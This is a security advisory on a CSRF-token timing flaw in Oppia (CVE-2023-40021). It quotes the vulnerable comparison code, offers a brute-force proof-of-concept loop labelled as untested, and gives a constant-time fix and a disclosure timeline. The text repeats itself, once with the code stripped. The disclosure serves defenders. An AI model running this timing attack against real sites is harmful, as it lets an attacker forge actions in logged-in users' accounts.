Vulnerability Report
Summary
When comparing a received CSRF token against the expected token, Oppia uses the string equality operator (==
), which is not safe against timing attacks. By repeatedly submitting invalid tokens, an attacker can brute-force the expected CSRF token character by character. Once they have recovered the token, they can then submit a forged request on behalf of a logged-in user and execute privileged actions on that user's behalf.
Details
The function to validate received CSRF tokens is at oppia.core.controllers.base.CsrfTokenManager.is_csrf_token_valid
:
|
def is_csrf_token_valid(cls, user_id: Optional[str], token: str) -> bool: |
|
"""Validates a given CSRF token. |
|
|
|
Args: |
|
user_id: str|None. The user_id to validate the CSRF token against. |
|
token: str. The CSRF token to validate. |
|
|
|
Returns: |
|
bool. Whether the given CSRF token is valid. |
|
""" |
|
try: |
|
parts = token.split('/') |
|
if len(parts) != 2: |
|
return False |
|
|
|
issued_on = int(parts[0]) |
|
age = cls._get_current_time() - issued_on |
|
if age > cls._CSRF_TOKEN_AGE_SECS: |
|
return False |
|
|
|
authentic_token = cls._create_token(user_id, issued_on) |
|
if authentic_token == token: |
|
return True |
|
|
|
return False |
|
except Exception: |
|
return False |
The vulnerability is here:
|
if authentic_token == token: |
In CPython, the equality operator on unicode objects uses memcmp
to compare the objects' values (see Objects/unicodeobject.c
in the CPython repo):
static int
unicode_compare_eq(PyObject *str1, PyObject *str2)
{
int kind;
const void *data1, *data2;
Py_ssize_t len;
int cmp;
len = PyUnicode_GET_LENGTH(str1);
if (PyUnicode_GET_LENGTH(str2) != len)
return 0;
kind = PyUnicode_KIND(str1);
if (PyUnicode_KIND(str2) != kind)
return 0;
data1 = PyUnicode_DATA(str1);
data2 = PyUnicode_DATA(str2);
cmp = memcmp(data1, data2, len * kind);
return (cmp == 0);
}
Here is an example implementation of memcmp from gcc (from libgcc/memcmp.c
in the gcc repo):
int
memcmp (const void *str1, const void *str2, size_t count)
{
const unsigned char *s1 = str1;
const unsigned char *s2 = str2;
while (count-- > 0)
{
if (*s1++ != *s2++)
return s1[-1] < s2[-1] ? -1 : 1;
}
return 0;
}
Notice that this function is not constant-time; that is, if str1
and str2
have their first difference at an earlier index, the function will terminate sooner. This means that if the received CSRF token and the expected one differ at an earlier index, the is_csrf_token_valid()
function will terminate sooner, which leaks sensitive information to an attacker. For details on how an attacker can abuse this information, see the PoC below.
PoC
Note: I have not tested this PoC. I am including it as an example of how this vulnerability could be abused to make the potential attack clear.
Prerequisites: To pull off this attack, an attacker needs a user to be logged-in to Oppia and have an attacker-controlled website open at the same time.
Attack: The attacker-controlled website issues requests to a protected Oppia endpoint, for example a PUT request to https://www.oppiatestserver.org/preferenceshandler/data to change the user's bio with the following payload:
{
"payload": {"update_type": "user_bio", "data": "testing"},
"csrf_token": "1691808272/GONUjFmtQN0DkHt67ucdZw==",
"source": "https://www.oppiatestserver.org/preferences"
}
Note that the CSRF token could be generated like this:
>>> import base64
>>> import hmac
>>> import time
>>> digest = base64.urlsafe_b64encode(hmac.digest(b'key', b'msg', digest='md5')).decode('utf-8')
>>> timestamp = time.time()
>>> print(f'{timestamp}/{digest}')
1691808272/GONUjFmtQN0DkHt67ucdZw==
Since the user is logged-in to Oppia, their valid session cookie will be sent along with the request, making it appear that the request came from an authorized user. However, the CSRF token will be invalid (here and elsewhere, I'm ignoring the negligible possibility of 128-bit collisions). The attacker needs to guess the 128-bit digest portion of the token, which is normally impossible. However, in this case, they can take advantage of the timing vulnerability discussed above. Here's how the attack might work (code is in Python for clarity, but to run on the attacker-controlled website, this would be implemented in JavaScript):
import time
import numpy as np
# Defined in RFC 4648, section 5: https://datatracker.ietf.org/doc/html/rfc4648.html#section-5
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_"
# How many trials to average timing measurements over. Averaging removes noise from network latency.
TRIALS = 5
# A base64-encoded MD5 hash is always 22 characters from ALPHABET, followed by two padding characters.
# This is because an MD5 hash is 128 bits. Each Base64 character provides log2(64)=6 bits of information,
# so we need ceil(128/6)=22 Base64 characters to encode the hash. Then 2 padding characters get added
# because Base64 encodes every 3 bytes as 4-character chunks, so the length of the base64 string needs to
# be a multiple of 4. Source: https://stackoverflow.com/a/13296298.
guess = ALPHABET[0] * 22 + '=='
for known_chars in range(22):
avg_times = []
for char in ALPHABET:
guess[known_chars] = char
total_time = 0
for _ in range(TRIALS):
start = time.time()
# Suppose we have a submit_request() function that takes a time and a guess,
# crafts the request, and sends it.
submit_request(start, guess)
end = time.time()
total_time += (end - start)
avg_times.append(total_time / TRIALS)
# With the correct guess, the submitted and expected tokens shared a longer prefix, so rejection took longer.
guess[known_chars] = ALPHABET[np.argmax(avg_times)]
Sometime in the last iteration of the outer loop (and possibly earlier if the attacker got lucky), the guess was correct and the request was accepted by the server, completing the attack.
Caveats: This attack has to complete within 1 second because every second, the time used in computing the token changes. The attacker then has to start their brute-forcing from scratch. However, the attacker only needs to submit 22(64)5=7,040 requests within this second, which while not trivial, is feasible. Further, an attacker will in expectation hit the correct token after submitting only half as many requests, may be able to optimize the brute-forcing logic to use fewer trials, and can run this attack against many users so that even a low probability of guessing the token leads to at least some successful attacks.
Suggested Remediation
Essential: The expected and received CSRF tokens should be compared using hmac.compare_digest()
instead, which is constant-time. The new code would look like this:
if hmac.compare_digest(authentic_token, token):
Note that compare_digest
only accepts either two ASCII-only str
objects or two bytes
objects.
Suggested:
- Instead of computing the HMAC with MD5, use SHA256. While the attacks on MD5 so far do not compromise the security of an HMAC, it would be prudent to move away from MD5 since attacks will likely get better over time.
- CSRF tokens should ideally be scoped to user sessions, but Oppia currently leaves them valid for 48 hours. This means that when a user logs out and logs back in, a CSRF token from the previous session could still be valid, which is not ideal. I don't see any attacks that this would allow, but session-scoped CSRF tokens are a common best practice (see OWASP link below).
- CSRF tokens should include a nonce, not just a timestamp, to ensure that consecutive calls in the same second produce different tokens. Again, this is more of a best-practice thing (see OWASP link below) than a protection against an attack (at least that I can see).
Further reading:
Impact
An attacker who can lure a logged-in Oppia user to a malicious website can perform any change on Oppia that the user is authorized to do, including changing profile information; creating, deleting, and changing explorations; etc. Note that the attacker cannot change a user's login credentials since those are managed by Google, which (hopefully) has its own CSRF protections.
Remediation
The essential remediation and suggested remediations 1 and 3 were implemented in #18769, which was merged in commit b89bf80. This commit will be deployed to production as part of May 2023 hotfix 2.
Timeline
- Reported: 2023-08-11
- CVE CVE-2023-40021 assigned: 2023-08-14
- Remediated:
- Remediation Merged: 2023-08-12
- Remediation Deployed: 2023-08-14 (in May 2023 hotfix 2)
- Disclosed: 2023-08-16
Vulnerability Report
Summary
When comparing a received CSRF token against the expected token, Oppia uses the string equality operator (
==
), which is not safe against timing attacks. By repeatedly submitting invalid tokens, an attacker can brute-force the expected CSRF token character by character. Once they have recovered the token, they can then submit a forged request on behalf of a logged-in user and execute privileged actions on that user's behalf.Details
The function to validate received CSRF tokens is at
oppia.core.controllers.base.CsrfTokenManager.is_csrf_token_valid
:oppia/core/controllers/base.py
Lines 964 to 990 in 3a05c35
The vulnerability is here:
oppia/core/controllers/base.py
Line 985 in 3a05c35
In CPython, the equality operator on unicode objects uses
memcmp
to compare the objects' values (seeObjects/unicodeobject.c
in the CPython repo):Here is an example implementation of memcmp from gcc (from
libgcc/memcmp.c
in the gcc repo):Notice that this function is not constant-time; that is, if
str1
andstr2
have their first difference at an earlier index, the function will terminate sooner. This means that if the received CSRF token and the expected one differ at an earlier index, theis_csrf_token_valid()
function will terminate sooner, which leaks sensitive information to an attacker. For details on how an attacker can abuse this information, see the PoC below.PoC
Note: I have not tested this PoC. I am including it as an example of how this vulnerability could be abused to make the potential attack clear.
Prerequisites: To pull off this attack, an attacker needs a user to be logged-in to Oppia and have an attacker-controlled website open at the same time.
Attack: The attacker-controlled website issues requests to a protected Oppia endpoint, for example a PUT request to https://www.oppiatestserver.org/preferenceshandler/data to change the user's bio with the following payload:
Note that the CSRF token could be generated like this:
Since the user is logged-in to Oppia, their valid session cookie will be sent along with the request, making it appear that the request came from an authorized user. However, the CSRF token will be invalid (here and elsewhere, I'm ignoring the negligible possibility of 128-bit collisions). The attacker needs to guess the 128-bit digest portion of the token, which is normally impossible. However, in this case, they can take advantage of the timing vulnerability discussed above. Here's how the attack might work (code is in Python for clarity, but to run on the attacker-controlled website, this would be implemented in JavaScript):
Sometime in the last iteration of the outer loop (and possibly earlier if the attacker got lucky), the guess was correct and the request was accepted by the server, completing the attack.
Caveats: This attack has to complete within 1 second because every second, the time used in computing the token changes. The attacker then has to start their brute-forcing from scratch. However, the attacker only needs to submit 22(64)5=7,040 requests within this second, which while not trivial, is feasible. Further, an attacker will in expectation hit the correct token after submitting only half as many requests, may be able to optimize the brute-forcing logic to use fewer trials, and can run this attack against many users so that even a low probability of guessing the token leads to at least some successful attacks.
Suggested Remediation
Essential: The expected and received CSRF tokens should be compared using
hmac.compare_digest()
instead, which is constant-time. The new code would look like this:Note that
compare_digest
only accepts either two ASCII-onlystr
objects or twobytes
objects.Suggested:
Further reading:
Impact
An attacker who can lure a logged-in Oppia user to a malicious website can perform any change on Oppia that the user is authorized to do, including changing profile information; creating, deleting, and changing explorations; etc. Note that the attacker cannot change a user's login credentials since those are managed by Google, which (hopefully) has its own CSRF protections.
Remediation
The essential remediation and suggested remediations 1 and 3 were implemented in #18769, which was merged in commit b89bf80. This commit will be deployed to production as part of May 2023 hotfix 2.
Timeline